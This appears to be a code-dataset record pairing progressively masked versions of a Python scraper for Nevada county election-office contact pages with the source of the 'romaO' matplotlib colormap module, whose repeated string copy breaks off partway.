IndexError:\n pass\n return emails, url\n\n\n<function token>\n\n\ndef parse_county(iter_):\n county_title = iter_.__next__().text.strip().title()\n locale = re.match('(.*) (City|County)', county_title).group(0)\n if county_title.startswith('Clark County Elections Mailing Address'):\n emails, url = parse_emails_url(iter_)\n return {'locale': locale, 'county': locale, 'emails': emails}\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n if 'Clerk' in el or 'Registrar' in el:\n official = el.strip().split(',')[0]\n break\n address = []\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n address += [el.strip()]\n if re.search('Nevada \\\\d{5}', el) or re.search('NV \\\\d{5}', el):\n break\n el = iter_.__next__()\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n el = el.replace(u'\\xa0', ' ')\n matches1 = re.search(\n '(\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4}) FAX (\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4})', el\n )\n matches2 = re.search(\n '(\\\\(\\\\d{3}\\\\) \\\\d{3}-VOTE \\\\(\\\\d{4}\\\\)) FAX (\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4})'\n , el)\n if matches1:\n phone = matches1.group(1)\n fax = matches1.group(2)\n elif matches2:\n phone = matches2.group(1)\n fax = matches2.group(2)\n else:\n print(county_title)\n print(el)\n print(re.search('(\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4}) FAX', el))\n assert False\n emails, url = parse_emails_url(iter_)\n init = {'city': locale} if locale.endswith('City') else {'county': locale}\n return {**init, 'locale': locale, 'official': official, 'address': ', '\n .join(address), 'emails': list(set(emails)), 'phones': [phone],\n 'faxes': [fax], 'url': url}\n\n\n<function token>\n<code token>\n", "<import token>\n\n\ndef is_element(el, tag):\n return isinstance(el, Tag) and el.name == tag\n\n\nclass ElemIterator:\n\n def __init__(self, els):\n 
self.els = els\n self.i = 0\n\n def peek(self):\n try:\n return self.els[self.i]\n except IndexError:\n return None\n\n def __next__(self):\n self.i += 1\n return self.els[self.i - 1]\n\n def hasNext(self):\n return len(self.els) > self.i\n\n def peek_till(self, tag):\n while not is_element(self.peek(), tag):\n self.__next__()\n\n def next_till(self, tag):\n self.peek_till(tag)\n self.__next__()\n\n\n<function token>\n\n\ndef parse_emails_url(iter_):\n emails = []\n url = None\n try:\n while True:\n iter_.peek_till('a')\n email = iter_.__next__()\n href = email['href']\n if href.startswith('mailto:'):\n if href[7:]:\n emails += [href[7:]]\n else:\n emails += [email.text]\n else:\n url = href\n except IndexError:\n pass\n return emails, url\n\n\n<function token>\n\n\ndef parse_county(iter_):\n county_title = iter_.__next__().text.strip().title()\n locale = re.match('(.*) (City|County)', county_title).group(0)\n if county_title.startswith('Clark County Elections Mailing Address'):\n emails, url = parse_emails_url(iter_)\n return {'locale': locale, 'county': locale, 'emails': emails}\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n if 'Clerk' in el or 'Registrar' in el:\n official = el.strip().split(',')[0]\n break\n address = []\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n address += [el.strip()]\n if re.search('Nevada \\\\d{5}', el) or re.search('NV \\\\d{5}', el):\n break\n el = iter_.__next__()\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n el = el.replace(u'\\xa0', ' ')\n matches1 = re.search(\n '(\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4}) FAX (\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4})', el\n )\n matches2 = re.search(\n '(\\\\(\\\\d{3}\\\\) \\\\d{3}-VOTE \\\\(\\\\d{4}\\\\)) FAX (\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4})'\n , el)\n if matches1:\n phone = matches1.group(1)\n fax = matches1.group(2)\n elif matches2:\n phone = matches2.group(1)\n fax = matches2.group(2)\n else:\n print(county_title)\n print(el)\n print(re.search('(\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4}) FAX', el))\n assert False\n emails, url = parse_emails_url(iter_)\n init = {'city': locale} if locale.endswith('City') else {'county': locale}\n return {**init, 'locale': locale, 'official': official, 'address': ', '\n .join(address), 'emails': list(set(emails)), 'phones': [phone],\n 'faxes': [fax], 'url': url}\n\n\n<function token>\n<code token>\n", "<import token>\n\n\ndef is_element(el, tag):\n return isinstance(el, Tag) and el.name == tag\n\n\nclass ElemIterator:\n\n def __init__(self, els):\n self.els = els\n self.i = 0\n\n def peek(self):\n try:\n return self.els[self.i]\n except IndexError:\n return None\n\n def __next__(self):\n self.i += 1\n return self.els[self.i - 1]\n\n def hasNext(self):\n return len(self.els) > self.i\n\n def peek_till(self, tag):\n while not is_element(self.peek(), tag):\n self.__next__()\n\n def next_till(self, tag):\n self.peek_till(tag)\n self.__next__()\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef parse_county(iter_):\n county_title = iter_.__next__().text.strip().title()\n locale = re.match('(.*) (City|County)', county_title).group(0)\n if county_title.startswith('Clark County Elections Mailing Address'):\n emails, url = parse_emails_url(iter_)\n return {'locale': locale, 'county': locale, 'emails': emails}\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n if 'Clerk' in el or 'Registrar' in el:\n official = el.strip().split(',')[0]\n break\n address = []\n while True:\n el = 
iter_.__next__()\n if isinstance(el, NavigableString):\n address += [el.strip()]\n if re.search('Nevada \\\\d{5}', el) or re.search('NV \\\\d{5}', el):\n break\n el = iter_.__next__()\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n el = el.replace(u'\\xa0', ' ')\n matches1 = re.search(\n '(\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4}) FAX (\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4})', el\n )\n matches2 = re.search(\n '(\\\\(\\\\d{3}\\\\) \\\\d{3}-VOTE \\\\(\\\\d{4}\\\\)) FAX (\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4})'\n , el)\n if matches1:\n phone = matches1.group(1)\n fax = matches1.group(2)\n elif matches2:\n phone = matches2.group(1)\n fax = matches2.group(2)\n else:\n print(county_title)\n print(el)\n print(re.search('(\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4}) FAX', el))\n assert False\n emails, url = parse_emails_url(iter_)\n init = {'city': locale} if locale.endswith('City') else {'county': locale}\n return {**init, 'locale': locale, 'official': official, 'address': ', '\n .join(address), 'emails': list(set(emails)), 'phones': [phone],\n 'faxes': [fax], 'url': url}\n\n\n<function token>\n<code token>\n", "<import token>\n<function token>\n\n\nclass ElemIterator:\n\n def __init__(self, els):\n self.els = els\n self.i = 0\n\n def peek(self):\n try:\n return self.els[self.i]\n except IndexError:\n return None\n\n def __next__(self):\n self.i += 1\n return self.els[self.i - 1]\n\n def hasNext(self):\n return len(self.els) > self.i\n\n def peek_till(self, tag):\n while not is_element(self.peek(), tag):\n self.__next__()\n\n def next_till(self, tag):\n self.peek_till(tag)\n self.__next__()\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef parse_county(iter_):\n county_title = iter_.__next__().text.strip().title()\n locale = re.match('(.*) (City|County)', county_title).group(0)\n if county_title.startswith('Clark County Elections Mailing Address'):\n emails, url = parse_emails_url(iter_)\n return {'locale': locale, 'county': locale, 'emails': emails}\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n if 'Clerk' in el or 'Registrar' in el:\n official = el.strip().split(',')[0]\n break\n address = []\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n address += [el.strip()]\n if re.search('Nevada \\\\d{5}', el) or re.search('NV \\\\d{5}', el):\n break\n el = iter_.__next__()\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n el = el.replace(u'\\xa0', ' ')\n matches1 = re.search(\n '(\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4}) FAX (\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4})', el\n )\n matches2 = re.search(\n '(\\\\(\\\\d{3}\\\\) \\\\d{3}-VOTE \\\\(\\\\d{4}\\\\)) FAX (\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4})'\n , el)\n if matches1:\n phone = matches1.group(1)\n fax = matches1.group(2)\n elif matches2:\n phone = matches2.group(1)\n fax = matches2.group(2)\n else:\n print(county_title)\n print(el)\n print(re.search('(\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4}) FAX', el))\n assert False\n emails, url = parse_emails_url(iter_)\n init = {'city': locale} if locale.endswith('City') else {'county': locale}\n return {**init, 'locale': locale, 'official': official, 'address': ', '\n .join(address), 'emails': list(set(emails)), 'phones': [phone],\n 'faxes': [fax], 'url': url}\n\n\n<function token>\n<code token>\n", "<import token>\n<function token>\n\n\nclass ElemIterator:\n\n def __init__(self, els):\n self.els = els\n self.i = 0\n\n def peek(self):\n try:\n return self.els[self.i]\n except IndexError:\n return None\n\n def __next__(self):\n 
self.i += 1\n return self.els[self.i - 1]\n\n def hasNext(self):\n return len(self.els) > self.i\n\n def peek_till(self, tag):\n while not is_element(self.peek(), tag):\n self.__next__()\n\n def next_till(self, tag):\n self.peek_till(tag)\n self.__next__()\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n", "<import token>\n<function token>\n\n\nclass ElemIterator:\n\n def __init__(self, els):\n self.els = els\n self.i = 0\n\n def peek(self):\n try:\n return self.els[self.i]\n except IndexError:\n return None\n\n def __next__(self):\n self.i += 1\n return self.els[self.i - 1]\n\n def hasNext(self):\n return len(self.els) > self.i\n <function token>\n\n def next_till(self, tag):\n self.peek_till(tag)\n self.__next__()\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n", "<import token>\n<function token>\n\n\nclass ElemIterator:\n\n def __init__(self, els):\n self.els = els\n self.i = 0\n <function token>\n\n def __next__(self):\n self.i += 1\n return self.els[self.i - 1]\n\n def hasNext(self):\n return len(self.els) > self.i\n <function token>\n\n def next_till(self, tag):\n self.peek_till(tag)\n self.__next__()\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n", "<import token>\n<function token>\n\n\nclass ElemIterator:\n\n def __init__(self, els):\n self.els = els\n self.i = 0\n <function token>\n <function token>\n\n def hasNext(self):\n return len(self.els) > self.i\n <function token>\n\n def next_till(self, tag):\n self.peek_till(tag)\n self.__next__()\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n", "<import token>\n<function token>\n\n\nclass ElemIterator:\n\n def __init__(self, els):\n self.els = els\n self.i = 0\n <function token>\n <function token>\n\n def hasNext(self):\n return len(self.els) > self.i\n <function token>\n <function token>\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n", "<import token>\n<function token>\n\n\nclass ElemIterator:\n <function token>\n <function token>\n <function token>\n\n def hasNext(self):\n return len(self.els) > self.i\n <function token>\n <function token>\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n", "<import token>\n<function token>\n\n\nclass ElemIterator:\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n", "<import token>\n<function token>\n<class token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n" ]
false
45
5082182af5a08970568dc1ab7a53ee5337260687
#
# romaO
# www.fabiocrameri.ch/colourmaps
from matplotlib.colors import LinearSegmentedColormap

cm_data = [[0.45137, 0.22346, 0.34187], [0.45418, 0.22244, 0.3361], [0.45696, 0.22158, 0.33043], [0.45975, 0.2209, 0.32483], [0.46251, 0.22035, 0.31935], [0.46527, 0.21994, 0.31394], [0.46803, 0.21968, 0.30862], [0.47078, 0.21958, 0.30337],
    [0.47352, 0.21962, 0.29822], [0.47628, 0.21982, 0.29316], [0.47902, 0.22017, 0.28818], [0.48178, 0.22067, 0.2833], [0.48453, 0.2213, 0.2785], [0.48731, 0.22208, 0.27379], [0.49008, 0.22304, 0.26917], [0.49286, 0.22411, 0.26461],
    [0.49567, 0.22536, 0.26016], [0.4985, 0.22677, 0.25579], [0.50134, 0.22833, 0.25153], [0.50419, 0.22999, 0.24733], [0.50707, 0.23188, 0.24322], [0.50997, 0.23387, 0.23923], [0.5129, 0.23605, 0.23533], [0.51584, 0.23835, 0.23151],
    [0.51884, 0.24082, 0.22779], [0.52184, 0.24345, 0.22414], [0.52489, 0.24625, 0.22065], [0.52797, 0.2492, 0.2172], [0.53108, 0.25231, 0.21387], [0.53423, 0.25556, 0.21064], [0.53742, 0.25899, 0.20753], [0.54063, 0.26255, 0.20452],
    [0.54389, 0.26628, 0.20158], [0.54718, 0.27017, 0.19879], [0.55051, 0.27419, 0.19613], [0.55389, 0.27839, 0.19356], [0.55731, 0.28273, 0.19109], [0.56075, 0.2872, 0.18877], [0.56424, 0.29186, 0.18655], [0.56777, 0.29665, 0.18446],
    [0.57134, 0.30157, 0.18248], [0.57495, 0.30666, 0.18065], [0.5786, 0.31186, 0.17898], [0.58228, 0.31724, 0.17743], [0.58602, 0.32275, 0.17597], [0.58977, 0.32838, 0.17473], [0.59358, 0.33415, 0.17358], [0.59742, 0.34005, 0.17261],
    [0.60129, 0.34606, 0.17179], [0.60519, 0.35223, 0.17114], [0.60915, 0.35851, 0.17065], [0.61311, 0.36491, 0.17034], [0.61713, 0.37143, 0.1702], [0.62118, 0.37808, 0.17023], [0.62526, 0.38483, 0.17046], [0.62937, 0.39171, 0.17087],
    [0.63352, 0.39869, 0.17148], [0.63769, 0.40579, 0.17229], [0.6419, 0.41299, 0.17332], [0.64613, 0.42029, 0.17458], [0.65041, 0.42771, 0.176], [0.6547, 0.43522, 0.17774], [0.65904, 0.44283, 0.17962], [0.66341, 0.45054, 0.18175],
    [0.6678, 0.45834, 0.18416], [0.67222, 0.46625, 0.1868], [0.67667, 0.47425, 0.18968], [0.68114, 0.48233, 0.19283], [0.68566, 0.49051, 0.19624], [0.69019, 0.49878, 0.19987], [0.69474, 0.50712, 0.20384], [0.69933, 0.51554, 0.20803],
    [0.70394, 0.52406, 0.21251], [0.70858, 0.53265, 0.21726], [0.71322, 0.5413, 0.22229], [0.7179, 0.55003, 0.22761], [0.72257, 0.55881, 0.23318], [0.72727, 0.56767, 0.23907], [0.73197, 0.57658, 0.24521], [0.73666, 0.58553, 0.25168],
    [0.74136, 0.59451, 0.25837], [0.74605, 0.60354, 0.26537], [0.75073, 0.61259, 0.27263], [0.75538, 0.62166, 0.28017], [0.76001, 0.63075, 0.28796], [0.7646, 0.63982, 0.29602], [0.76914, 0.64889, 0.30433], [0.77363, 0.65793, 0.31287],
    [0.77806, 0.66694, 0.32165], [0.78242, 0.6759, 0.33066], [0.78669, 0.68481, 0.33988], [0.79087, 0.69365, 0.34929], [0.79494, 0.7024, 0.35888], [0.7989, 0.71106, 0.36867], [0.80273, 0.71961, 0.37859], [0.80642, 0.72803, 0.38866],
    [0.80996, 0.73631, 0.39885], [0.81334, 0.74446, 0.40916], [0.81655, 0.75244, 0.41957], [0.81956, 0.76025, 0.43004], [0.82239, 0.76787, 0.44057], [0.82501, 0.7753, 0.45115], [0.82742, 0.78252, 0.46174], [0.8296, 0.78953, 0.47235],
    [0.83155, 0.79631, 0.48293], [0.83326, 0.80287, 0.49349], [0.83472, 0.80919, 0.50402], [0.83592, 0.81526, 0.51449], [0.83686, 0.82109, 0.52487], [0.83753, 0.82666, 0.53517], [0.83793, 0.83198, 0.54537], [0.83805, 0.83703, 0.55546],
    [0.83788, 0.84182, 0.56542], [0.83744, 0.84635, 0.57525], [0.8367, 0.85061, 0.58493], [0.83567, 0.85462, 0.59446], [0.83435, 0.85835, 0.60382], [0.83274, 0.86183, 0.61301], [0.83084, 0.86504, 0.62202], [0.82864, 0.868,
0.63085], [0.82615, 0.87068, 0.63949], [0.82337, 0.87312, 0.64792], [0.8203, 0.87531, 0.65617], [0.81695, 0.87724, 0.6642], [0.81331, 0.87892, 0.67203], [0.80939, 0.88036, 0.67964], [0.80518, 0.88156, 0.68705], [0.80071, 0.8825, 0.69424], [0.79595, 0.88322, 0.70121], [0.79094, 0.8837, 0.70797], [0.78566, 0.88395, 0.7145], [0.78012, 0.88396, 0.72082], [0.77433, 0.88375, 0.72692], [0.7683, 0.88331, 0.73279], [0.76203, 0.88264, 0.73844], [0.75553, 0.88177, 0.74387], [0.74879, 0.88066, 0.74908], [0.74184, 0.87934, 0.75407], [0.73468, 0.87781, 0.75884], [0.72731, 0.87607, 0.76339], [0.71976, 0.87411, 0.76772], [0.71201, 0.87195, 0.77184], [0.70408, 0.86958, 0.77573], [0.69599, 0.86701, 0.77941], [0.68774, 0.86425, 0.78288], [0.67934, 0.86127, 0.78614], [0.67081, 0.85811, 0.78919], [0.66215, 0.85476, 0.79202], [0.65336, 0.8512, 0.79465], [0.64448, 0.84747, 0.79707], [0.6355, 0.84356, 0.7993], [0.62645, 0.83947, 0.80131], [0.61732, 0.83519, 0.80313], [0.60814, 0.83075, 0.80476], [0.59891, 0.82614, 0.80619], [0.58965, 0.82137, 0.80743], [0.58037, 0.81644, 0.80848], [0.57108, 0.81135, 0.80935], [0.56181, 0.80612, 0.81004], [0.55255, 0.80074, 0.81055], [0.54332, 0.79522, 0.81088], [0.53412, 0.78958, 0.81105], [0.525, 0.7838, 0.81105], [0.51593, 0.77791, 0.81088], [0.50695, 0.77189, 0.81055], [0.49808, 0.76577, 0.81007], [0.48928, 0.75954, 0.80944], [0.48061, 0.75321, 0.80866], [0.47207, 0.7468, 0.80773], [0.46365, 0.74029, 0.80667], [0.45539, 0.7337, 0.80546], [0.44728, 0.72703, 0.80413], [0.43934, 0.7203, 0.80266], [0.43158, 0.7135, 0.80107], [0.42398, 0.70664, 0.79936], [0.41658, 0.69971, 0.79752], [0.40938, 0.69275, 0.79557], [0.40237, 0.68572, 0.79351], [0.3956, 0.67865, 0.79133], [0.38903, 0.67155, 0.78905], [0.38267, 0.66441, 0.78666], [0.37656, 0.65724, 0.78416], [0.37066, 0.65003, 0.78155], [0.36502, 0.64279, 0.77884], [0.35961, 0.63552, 0.77604], [0.35446, 0.62824, 0.77312], [0.34955, 0.62094, 0.77011], [0.3449, 0.6136, 0.767], [0.34051, 0.60625, 0.76378], [0.33637, 0.59889, 0.76047], [0.33253, 0.59151, 0.75704], [0.32893, 0.58412, 0.75351], [0.32559, 0.57671, 0.74987], [0.32256, 0.56928, 0.74613], [0.31978, 0.56186, 0.74228], [0.31727, 0.55441, 0.7383], [0.31505, 0.54695, 0.73422], [0.31311, 0.53948, 0.73002], [0.31144, 0.53201, 0.72569], [0.31007, 0.52453, 0.72124], [0.30897, 0.51704, 0.71667], [0.30811, 0.50955, 0.71197], [0.30755, 0.50205, 0.70713], [0.30726, 0.49456, 0.70216], [0.30723, 0.48707, 0.69706], [0.30746, 0.47958, 0.69182], [0.30795, 0.4721, 0.68643], [0.3087, 0.46463, 0.6809], [0.30968, 0.45716, 0.67525], [0.31088, 0.44973, 0.66944], [0.31228, 0.44232, 0.6635], [0.31393, 0.43493, 0.65741], [0.31578, 0.42758, 0.65118], [0.3178, 0.42025, 0.64482], [0.32001, 0.41299, 0.63833], [0.32238, 0.40577, 0.6317], [0.32489, 0.39861, 0.62495], [0.32755, 0.39152, 0.61809], [0.33035, 0.38448, 0.61111], [0.33327, 0.37755, 0.60402], [0.33627, 0.37068, 0.59684], [0.33939, 0.36392, 0.58955], [0.34257, 0.35728, 0.58219], [0.3458, 0.35073, 0.57476], [0.34912, 0.34428, 0.56727], [0.35247, 0.33797, 0.55971], [0.35587, 0.33179, 0.55212], [0.35927, 0.32574, 0.54448], [0.36271, 0.31986, 0.53684], [0.36617, 0.31411, 0.52917], [0.36961, 0.30852, 0.52148], [0.37306, 0.30306, 0.51382], [0.37652, 0.2978, 0.50615], [0.37994, 0.29269, 0.49854], [0.38336, 0.28775, 0.49094], [0.38674, 0.28301, 0.48337], [0.39011, 0.27842, 0.47586], [0.39346, 0.27401, 0.4684], [0.39677, 0.26978, 0.461], [0.40006, 0.26573, 0.45366], [0.40333, 0.26185, 0.4464], [0.40655, 0.25815, 0.43921], [0.40974, 0.25466, 0.43212], [0.4129, 
    0.25132, 0.42509], [0.41602, 0.24817, 0.41813], [0.41912, 0.24515, 0.41128], [0.42218, 0.24235, 0.40451], [0.42522, 0.23972, 0.39784], [0.42823, 0.23728, 0.39126], [0.43121, 0.23498, 0.38475], [0.43415, 0.23282, 0.37836],
    [0.43708, 0.23086, 0.37204], [0.43998, 0.22907, 0.36583], [0.44286, 0.22743, 0.3597], [0.44571, 0.22596, 0.35366], [0.44855, 0.2246, 0.34773]]

romaO_map = LinearSegmentedColormap.from_list('romaO', cm_data)
# For use of "viscm view"
test_cm = romaO_map

if __name__ == "__main__":
    import matplotlib.pyplot as plt
    import numpy as np

    try:
        from viscm import viscm
        viscm(romaO_map)
    except ImportError:
        print("viscm not found, falling back on simple display")
        plt.imshow(np.linspace(0, 100, 256)[None, :], aspect='auto',
                   cmap=romaO_map)
        plt.show()
[ "# \n# romaO\n# www.fabiocrameri.ch/colourmaps\nfrom matplotlib.colors import LinearSegmentedColormap \n \ncm_data = [[0.45137, 0.22346, 0.34187], \n [0.45418, 0.22244, 0.3361], \n [0.45696, 0.22158, 0.33043], \n [0.45975, 0.2209, 0.32483], \n [0.46251, 0.22035, 0.31935], \n [0.46527, 0.21994, 0.31394], \n [0.46803, 0.21968, 0.30862], \n [0.47078, 0.21958, 0.30337], \n [0.47352, 0.21962, 0.29822], \n [0.47628, 0.21982, 0.29316], \n [0.47902, 0.22017, 0.28818], \n [0.48178, 0.22067, 0.2833], \n [0.48453, 0.2213, 0.2785], \n [0.48731, 0.22208, 0.27379], \n [0.49008, 0.22304, 0.26917], \n [0.49286, 0.22411, 0.26461], \n [0.49567, 0.22536, 0.26016], \n [0.4985, 0.22677, 0.25579], \n [0.50134, 0.22833, 0.25153], \n [0.50419, 0.22999, 0.24733], \n [0.50707, 0.23188, 0.24322], \n [0.50997, 0.23387, 0.23923], \n [0.5129, 0.23605, 0.23533], \n [0.51584, 0.23835, 0.23151], \n [0.51884, 0.24082, 0.22779], \n [0.52184, 0.24345, 0.22414], \n [0.52489, 0.24625, 0.22065], \n [0.52797, 0.2492, 0.2172], \n [0.53108, 0.25231, 0.21387], \n [0.53423, 0.25556, 0.21064], \n [0.53742, 0.25899, 0.20753], \n [0.54063, 0.26255, 0.20452], \n [0.54389, 0.26628, 0.20158], \n [0.54718, 0.27017, 0.19879], \n [0.55051, 0.27419, 0.19613], \n [0.55389, 0.27839, 0.19356], \n [0.55731, 0.28273, 0.19109], \n [0.56075, 0.2872, 0.18877], \n [0.56424, 0.29186, 0.18655], \n [0.56777, 0.29665, 0.18446], \n [0.57134, 0.30157, 0.18248], \n [0.57495, 0.30666, 0.18065], \n [0.5786, 0.31186, 0.17898], \n [0.58228, 0.31724, 0.17743], \n [0.58602, 0.32275, 0.17597], \n [0.58977, 0.32838, 0.17473], \n [0.59358, 0.33415, 0.17358], \n [0.59742, 0.34005, 0.17261], \n [0.60129, 0.34606, 0.17179], \n [0.60519, 0.35223, 0.17114], \n [0.60915, 0.35851, 0.17065], \n [0.61311, 0.36491, 0.17034], \n [0.61713, 0.37143, 0.1702], \n [0.62118, 0.37808, 0.17023], \n [0.62526, 0.38483, 0.17046], \n [0.62937, 0.39171, 0.17087], \n [0.63352, 0.39869, 0.17148], \n [0.63769, 0.40579, 0.17229], \n [0.6419, 0.41299, 0.17332], \n [0.64613, 0.42029, 0.17458], \n [0.65041, 0.42771, 0.176], \n [0.6547, 0.43522, 0.17774], \n [0.65904, 0.44283, 0.17962], \n [0.66341, 0.45054, 0.18175], \n [0.6678, 0.45834, 0.18416], \n [0.67222, 0.46625, 0.1868], \n [0.67667, 0.47425, 0.18968], \n [0.68114, 0.48233, 0.19283], \n [0.68566, 0.49051, 0.19624], \n [0.69019, 0.49878, 0.19987], \n [0.69474, 0.50712, 0.20384], \n [0.69933, 0.51554, 0.20803], \n [0.70394, 0.52406, 0.21251], \n [0.70858, 0.53265, 0.21726], \n [0.71322, 0.5413, 0.22229], \n [0.7179, 0.55003, 0.22761], \n [0.72257, 0.55881, 0.23318], \n [0.72727, 0.56767, 0.23907], \n [0.73197, 0.57658, 0.24521], \n [0.73666, 0.58553, 0.25168], \n [0.74136, 0.59451, 0.25837], \n [0.74605, 0.60354, 0.26537], \n [0.75073, 0.61259, 0.27263], \n [0.75538, 0.62166, 0.28017], \n [0.76001, 0.63075, 0.28796], \n [0.7646, 0.63982, 0.29602], \n [0.76914, 0.64889, 0.30433], \n [0.77363, 0.65793, 0.31287], \n [0.77806, 0.66694, 0.32165], \n [0.78242, 0.6759, 0.33066], \n [0.78669, 0.68481, 0.33988], \n [0.79087, 0.69365, 0.34929], \n [0.79494, 0.7024, 0.35888], \n [0.7989, 0.71106, 0.36867], \n [0.80273, 0.71961, 0.37859], \n [0.80642, 0.72803, 0.38866], \n [0.80996, 0.73631, 0.39885], \n [0.81334, 0.74446, 0.40916], \n [0.81655, 0.75244, 0.41957], \n [0.81956, 0.76025, 0.43004], \n [0.82239, 0.76787, 0.44057], \n [0.82501, 0.7753, 0.45115], \n [0.82742, 0.78252, 0.46174], \n [0.8296, 0.78953, 0.47235], \n [0.83155, 0.79631, 0.48293], \n [0.83326, 0.80287, 0.49349], \n [0.83472, 0.80919, 0.50402], \n [0.83592, 0.81526, 0.51449], \n 
[0.83686, 0.82109, 0.52487], \n [0.83753, 0.82666, 0.53517], \n [0.83793, 0.83198, 0.54537], \n [0.83805, 0.83703, 0.55546], \n [0.83788, 0.84182, 0.56542], \n [0.83744, 0.84635, 0.57525], \n [0.8367, 0.85061, 0.58493], \n [0.83567, 0.85462, 0.59446], \n [0.83435, 0.85835, 0.60382], \n [0.83274, 0.86183, 0.61301], \n [0.83084, 0.86504, 0.62202], \n [0.82864, 0.868, 0.63085], \n [0.82615, 0.87068, 0.63949], \n [0.82337, 0.87312, 0.64792], \n [0.8203, 0.87531, 0.65617], \n [0.81695, 0.87724, 0.6642], \n [0.81331, 0.87892, 0.67203], \n [0.80939, 0.88036, 0.67964], \n [0.80518, 0.88156, 0.68705], \n [0.80071, 0.8825, 0.69424], \n [0.79595, 0.88322, 0.70121], \n [0.79094, 0.8837, 0.70797], \n [0.78566, 0.88395, 0.7145], \n [0.78012, 0.88396, 0.72082], \n [0.77433, 0.88375, 0.72692], \n [0.7683, 0.88331, 0.73279], \n [0.76203, 0.88264, 0.73844], \n [0.75553, 0.88177, 0.74387], \n [0.74879, 0.88066, 0.74908], \n [0.74184, 0.87934, 0.75407], \n [0.73468, 0.87781, 0.75884], \n [0.72731, 0.87607, 0.76339], \n [0.71976, 0.87411, 0.76772], \n [0.71201, 0.87195, 0.77184], \n [0.70408, 0.86958, 0.77573], \n [0.69599, 0.86701, 0.77941], \n [0.68774, 0.86425, 0.78288], \n [0.67934, 0.86127, 0.78614], \n [0.67081, 0.85811, 0.78919], \n [0.66215, 0.85476, 0.79202], \n [0.65336, 0.8512, 0.79465], \n [0.64448, 0.84747, 0.79707], \n [0.6355, 0.84356, 0.7993], \n [0.62645, 0.83947, 0.80131], \n [0.61732, 0.83519, 0.80313], \n [0.60814, 0.83075, 0.80476], \n [0.59891, 0.82614, 0.80619], \n [0.58965, 0.82137, 0.80743], \n [0.58037, 0.81644, 0.80848], \n [0.57108, 0.81135, 0.80935], \n [0.56181, 0.80612, 0.81004], \n [0.55255, 0.80074, 0.81055], \n [0.54332, 0.79522, 0.81088], \n [0.53412, 0.78958, 0.81105], \n [0.525, 0.7838, 0.81105], \n [0.51593, 0.77791, 0.81088], \n [0.50695, 0.77189, 0.81055], \n [0.49808, 0.76577, 0.81007], \n [0.48928, 0.75954, 0.80944], \n [0.48061, 0.75321, 0.80866], \n [0.47207, 0.7468, 0.80773], \n [0.46365, 0.74029, 0.80667], \n [0.45539, 0.7337, 0.80546], \n [0.44728, 0.72703, 0.80413], \n [0.43934, 0.7203, 0.80266], \n [0.43158, 0.7135, 0.80107], \n [0.42398, 0.70664, 0.79936], \n [0.41658, 0.69971, 0.79752], \n [0.40938, 0.69275, 0.79557], \n [0.40237, 0.68572, 0.79351], \n [0.3956, 0.67865, 0.79133], \n [0.38903, 0.67155, 0.78905], \n [0.38267, 0.66441, 0.78666], \n [0.37656, 0.65724, 0.78416], \n [0.37066, 0.65003, 0.78155], \n [0.36502, 0.64279, 0.77884], \n [0.35961, 0.63552, 0.77604], \n [0.35446, 0.62824, 0.77312], \n [0.34955, 0.62094, 0.77011], \n [0.3449, 0.6136, 0.767], \n [0.34051, 0.60625, 0.76378], \n [0.33637, 0.59889, 0.76047], \n [0.33253, 0.59151, 0.75704], \n [0.32893, 0.58412, 0.75351], \n [0.32559, 0.57671, 0.74987], \n [0.32256, 0.56928, 0.74613], \n [0.31978, 0.56186, 0.74228], \n [0.31727, 0.55441, 0.7383], \n [0.31505, 0.54695, 0.73422], \n [0.31311, 0.53948, 0.73002], \n [0.31144, 0.53201, 0.72569], \n [0.31007, 0.52453, 0.72124], \n [0.30897, 0.51704, 0.71667], \n [0.30811, 0.50955, 0.71197], \n [0.30755, 0.50205, 0.70713], \n [0.30726, 0.49456, 0.70216], \n [0.30723, 0.48707, 0.69706], \n [0.30746, 0.47958, 0.69182], \n [0.30795, 0.4721, 0.68643], \n [0.3087, 0.46463, 0.6809], \n [0.30968, 0.45716, 0.67525], \n [0.31088, 0.44973, 0.66944], \n [0.31228, 0.44232, 0.6635], \n [0.31393, 0.43493, 0.65741], \n [0.31578, 0.42758, 0.65118], \n [0.3178, 0.42025, 0.64482], \n [0.32001, 0.41299, 0.63833], \n [0.32238, 0.40577, 0.6317], \n 